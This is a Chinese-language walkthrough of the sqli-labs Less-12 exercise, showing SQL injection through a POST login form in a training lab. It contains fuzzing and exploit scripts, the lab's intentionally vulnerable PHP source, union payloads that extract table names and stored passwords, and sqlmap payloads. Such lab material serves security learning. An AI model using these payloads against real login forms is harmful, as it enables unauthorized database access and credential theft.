sqli-lab-less12
一、靶标地址
Less-12 POST-Error Based-Double quotes-String - with twist
#字符型带双引号和括号基于报错的SQL注入
http://127.0.0.1/sqli/less-12/
二、漏洞探测
输入admin admin
得到post数据包
uname=admin&passwd=admin&submit=Submit
#Your Login name:admin
#Your Password:admin
猜测业务逻辑流程应该是根据输入的username、password去查询然后进行比对
uname=1")&passwd=2&submit=Submit
#You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '") and password=("2") LIMIT 0,1' at line 1
猜测语句为 ") and password=("2") LIMIT 0,1
推测语句为select username,password from users where username= ("$uname") and password='$passwd' limit 0,1;
fuzz.txt
'
"
')
")
'))
"))
#使用python脚本进行fuzz
import requests
url="http://192.168.128.159/sqli/less-12/index.php"
#F12查看或者burpsuite抓包
header={
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.78 Safari/537.36','Accept-Language': 'en-US,en;q=0.9',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7'
}
file = open("./fuzz-12.txt","r")
payloads = file.read().splitlines()
for i in range(len(payloads)):
print("==============This is "+ str(i) + payloads[i]+"==============")
subpayload = "1" + payloads[i]
payload = {
"uname" : subpayload,
"passwd" : "1"
}
response=requests.post(url,headers=header,data=payload)
print(response.text)
三、源码分析
<?php
//including the Mysql connect parameters.
include("../sql-connections/sql-connect.php");
error_reporting(0);
// take the variables
if(isset($_POST['uname']) && isset($_POST['passwd']))
{
$uname=$_POST['uname'];
$passwd=$_POST['passwd'];
//logging the connection parameters to a file for analysis.
$fp=fopen('result.txt','a');
fwrite($fp,'User Name:'.$uname."\n");
fwrite($fp,'Password:'.$passwd."\n");
fclose($fp);
// connectivity
$uname='"'.$uname.'"';
$passwd='"'.$passwd.'"';
@$sql="SELECT username, password FROM users WHERE username=($uname) and password=($passwd) LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row)
{
//echo '<font color= "#0000ff">';
echo "<br>";
echo '<font color= "#FFFF00" font size = 4>';
//echo " You Have successfully logged in " ;
echo '<font size="3" color="#0000ff">';
echo "<br>";
echo 'Your Login name:'. $row['username'];
echo "<br>";
echo 'Your Password:' .$row['password'];
echo "<br>";
echo "</font>";
echo "<br>";
echo "<br>";
echo '<img src="../images/flag.jpg" />';
echo "</font>";
}
else
{
echo '<font color= "#0000ff" font size="3">';
//echo "Try again looser";
print_r(mysql_error());
echo "</br>";
echo "</br>";
echo "</br>";
echo '<img src="../images/slap.jpg" />';
echo "</font>";
}
}
?>
四、黑盒与白盒测试
$uname='"'.$uname.'"';
$passwd='"'.$passwd.'"';
@$sql="SELECT username, password FROM users WHERE username=($uname) and password=($passwd) LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
#查询用户和数据库
uname=1") union select user(),database() #&passwd=1&submit=Submit
#报错 这里不能使用--+ 而使用#不会报错
uname=1' union select user(),database() --+&passwd=1&submit=Submit
#uname=1不会有任何回显,所以后面的两个值可以被回显出来
select username,password from users where username=("1") union select user(),database() #' and password=("1") limit 0,1;
#查询表名
uname=1") union select (select group_concat(table_name) from information_schema.tables where table_schema='security'),database() #&passwd=1&submit=Submit
#查询字段名
uname=1") union select (select group_concat(column_name) from information_schema.columns where table_name='users'),database() #&passwd=1&submit=Submit
#查询字段值
uname=1") union select (select group_concat(username) from users),database() #&passwd=1&submit=Submit
uname=1") union select (select group_concat(password) from users),database() #&passwd=1&submit=Submit
五、脚本撰写
import requests
url="http://192.168.128.159/sqli/less-12/index.php"
#F12查看或者burpsuite抓包
header={
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.78 Safari/537.36','Accept-Language': 'en-US,en;q=0.9',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7'
}
payload = {
"uname" : "1\") union select user(),database() #",
"passwd" : "admin"
}
response=requests.post(url,headers=header,data=payload)
print(response.text)
六、sqlmap
sqlmap -u "http://192.168.128.159/sqli/Less-12/" --data "uname=1&passwd=1&submit=Submit" --batch
Parameter: uname (POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
Payload: uname=1") OR NOT 8916=8916#&passwd=1&submit=Submit
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: uname=1") AND (SELECT 4663 FROM(SELECT COUNT(*),CONCAT(0x716a706a71,(SELECT (ELT(4663=4663,1))),0x7171717071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND ("JyBN"="JyBN&passwd=1&submit=Submit
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: uname=1") AND (SELECT 8405 FROM (SELECT(SLEEP(5)))MNFl) AND ("TVUz"="TVUz&passwd=1&submit=Submit
Type: UNION query
Title: MySQL UNION query (NULL) - 2 columns
Payload: uname=1") UNION ALL SELECT NULL,CONCAT(0x716a706a71,0x674d56426a6c737944506f647a52447875467642456b6668746d774443625075704f445572737070,0x7171717071)#&passwd=1&submit=Submit
七、总结
1、通过表单提交数据
2、sqlmap新用法